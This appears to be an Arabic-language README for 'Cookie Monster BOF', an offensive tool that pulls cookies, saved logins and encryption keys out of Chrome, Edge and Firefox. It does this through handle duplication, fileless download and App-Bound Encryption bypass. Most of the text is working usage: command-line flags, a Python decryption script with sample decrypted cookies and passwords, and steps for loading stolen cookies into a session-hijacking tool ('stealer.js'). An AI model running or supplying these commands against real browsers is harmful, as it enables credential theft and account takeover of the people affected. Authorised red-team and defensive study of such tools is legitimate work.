
أداة قائمة على BOF لاستخراج ملفات تعريف الارتباط وبيانات الاعتماد من المتصفحات Chrome وEdge وFirefox عبر تكرار المقبض (handle duplication) والتنزيل بدون ملفات (fileless download)، مع دعم فك التشفير دون اتصال (offline decryption).
سرقة ملفات تعريف الارتباط للمتصفحات Edge وChrome وFirefox من خلال BOF!
سيقوم Cookie Monster BOF باستخراج WebKit Master Key وApp Bound Encryption Key لكل من Edge وChrome، وتحديد موقع عملية متصفح بها مقبض لملفات Cookies وLogin Data، ونسخ المقابض ثم تنزيل الملف(الملفات) المستهدفة بدون تخزينها على القرص.
بمجرد تنزيل ملف(ملفات) Cookies/Login Data، يمكن استخدام سكريبت فك التشفير بلغة Python لاستخراج تلك الأسرار! ستقوم وحدة Firefox بتحليل ملف profiles.ini وتحديد مكان وجود ملفي logins.json وkey4.db وتنزيلهما. تمت الإشارة إلى مستودع منفصل على GitHub لفك التشفير دون اتصال.
تحديثات Chrome وEdge 127+: تستخدم ملفات تعريف الارتباط الجديدة في متصفح Chromium (الإصدار v20) مفتاح App Bound لتشفير ملفات تعريف الارتباط. ونتيجة لذلك، يصبح استرجاع app_bound_encrypted_key أكثر صعوبة. بفضل snovvcrash، يمكن إنجاز هذه العملية دون الحاجة إلى تصعيد صلاحياتك. الشرط هو أن تكون عمليتك قيد التشغيل من مجلد تطبيق متصفح الويب. أي يجب الحقن في Chrome/Edge أو تشغيل beacon من نفس مجلد تطبيق المتصفح.
فك تشفير ملفات تعريف الارتباط كـ SYSTEM ودون الحاجة إلى الحقن في عملية المتصفح! تحية لـ @sdemius لاكتشاف كيفية فك تشفير دالة PostProcessData الخاصة بـ Chrome PostProcessData و @b1scoito لـ الشرح! قام Chrome 137+ بتغيير دالة PostProcessData() مرة أخرى، تحية لـ @runassu لحلها!
تمت إضافة تحديث حديث لفك تشفير WebKit Master Key بفضل @M1ndo. يتم فك تشفير المفتاح الأساسي تلقائيًا بجانب المفتاح المرتبط بالتطبيق. لاستخدامه، أضف المفتاح إلى سكريبت Python لفك التشفير. يُستخدم هذا المفتاح بشكل أساسي عند استخدام الملفات الشخصية المتجولة (roaming profiles) أو كلمات المرور المخزنة في Edge أو كلمات المرور القديمة المخزنة.
Usage: cookie-monster [--chrome || --edge || --system <Local State File Path> <PID> || --firefox || --chromeCookiePID <PID> || --chromeLoginDataPID <PID> || --edgeCookiePID <PID> || --edgeLoginDataPID <PID> ] [--cookie-only] [--key-only] [--login-data-only] [--copy-file "C:\Folder\Location\"]
cookie-monster Examples:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --system "C:\Users\<USER>\AppData\Local\<BROWSER>\User Data\Local State" <PID>
cookie-moster --firefox
cookie-monster --chromeCookiePID <PID>
cookie-monster --chromeLoginDataPID <PID>
cookie-monster --edgeCookiePID <PID>
cookie-monster --edgeLoginDataPID <PID>
cookie-monster Options:
--chrome, يفحص جميع العمليات الجارية والمقابض، وإذا تطابقت إحداها مع chrome.exe، ينسخ المقبض لملف cookies ثم ينسخ الملف إلى مجلد العمل الحالي (CWD)
--edge, يفحص جميع العمليات الجارية والمقابض، وإذا تطابقت إحداها مع msedge.exe، ينسخ المقبض لملف cookies ثم ينسخ الملف إلى مجلد العمل الحالي (CWD)
--system, يفك تشفير مفتاح التشفير المرتبط بالتطبيق لمتصفحات Chromium دون الحقن في المتصفح. يتطلب المسار إلى ملف Local State ومعرف العملية (PID) لعملية مستخدم من أجل انتحال الهوية
--firefox, يبحث عن ملف profiles.ini ويحدد موقع ملفي key4.db وlogins.json
--chromeCookiePID, إذا تم توفير معرف عملية Chrome، ابحث عن العملية المحددة التي لديها مقبض لملف cookies، حدد معرف العملية لتكرار مقبضها وملفها
--chromeLoginDataPID, إذا تم توفير معرف عملية Chrome، ابحث عن العملية المحددة التي لديها مقبض لـ Login Data، حدد معرف العملية لتكرار مقبضها وملفها
--edgeCookiePID, إذا تم توفير معرف عملية Edge، ابحث عن العملية المحددة التي لديها مقبض لملف cookies، حدد معرف العملية لتكرار مقبضها وملفها
--edgeLoginDataPID, إذا تم توفير معرف عملية Edge، ابحث عن العملية المحددة التي لديها مقبض لـ Login Data، حدد معرف العملية لتكرار مقبضها وملفها
--key-only, استرجاع مفتاح التشفير المرتبط بالتطبيق فقط. لا تحاول تنزيل ملفات Cookie أو Login Data.
--cookie-only, استرجاع ملف Cookie فقط. لا تحاول تنزيل ملف Login Data أو استرجاع مفتاح التشفير المرتبط بالتطبيق.
--login-data-only, استرجاع ملف Login Data فقط. لا تحاول تنزيل ملف Cookie أو استرجاع مفتاح التشفير المرتبط بالتطبيق.
--copy-file, ينسخ ملفي Cookie وLogin Data إلى المجلد المحدد. لا يستخدم طريقة الاسترجاع بدون ملفات.
تأكد من تثبيت Mingw-w64 و make على نظام Linux قبل الترجمة.
make
تثبيت المتطلبات
pip3 install -r requirements.txt
الاستخدام
python3 decrypt.py -h
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]
Decrypt Chromium cookies and passwords given a key and DB file
options:
-h, --help show this help message and exit
-k KEY, --key KEY Decryption key
-o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
Option to choose
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
-mk MASTER_KEY, --master-key MASTER_KEY
Old key used in v10 passwords
أمثلة: فك تشفير ملف Cookies لمتصفح Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
فك تشفير ملفات تعريف الارتباط في Chrome باستخدام مفتاح Chrome AES
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
فك تشفير ملف Cookies لمتصفح Chrome/Edge وحفظه بتنسيق JSON
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
استيراد ملف JSON لملفات تعريف الارتباط باستخدام https://cookie-editor.com/
فك تشفير ملف كلمات المرور لمتصفح Chrome/Edge
python3 decrypt.py -o passwords -f EdgePasswords.db -k '\xf9\x...' -mk '\xf3\x..'
URL: https://test.com/
Username: adgf
Password: pass
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
فك تشفير ملفات تعريف الارتباط وبيانات الاعتماد المخزنة في Firefox:
https://github.com/lclevy/firepwd
تمت إضافة خيار cuddlephish إلى سكريبت فك التشفير الذي يجب أن يدعم استخدام ملفات تعريف الارتباط مع https://github.com/fkasler/cuddlephish
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db
# Clone Project
cd
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
# Install Dependencies Example on Debian
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install
# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
لم يكن بإمكان هذا المشروع أن يكتمل دون مساعدة Mr-Un1k0d3r وفيديوهاته الموسمية الرائعة!
أوصي بشدة بمشاهدة دروسه!!!
مستخرج WebKit Master Key لملفات تعريف الارتباط:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
تنزيل بدون ملفات:
https://github.com/fortra/nanodump
فك تشفير ملفات Cookies وLogin Data:
https://github.com/login-securite/DonPAPI
فك تشفير المفتاح المرتبط بالتطبيق:
https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824
فك تشفير ملفات تعريف الارتباط في Chrome 137+
https://github.com/runassu/chrome_v20_decryption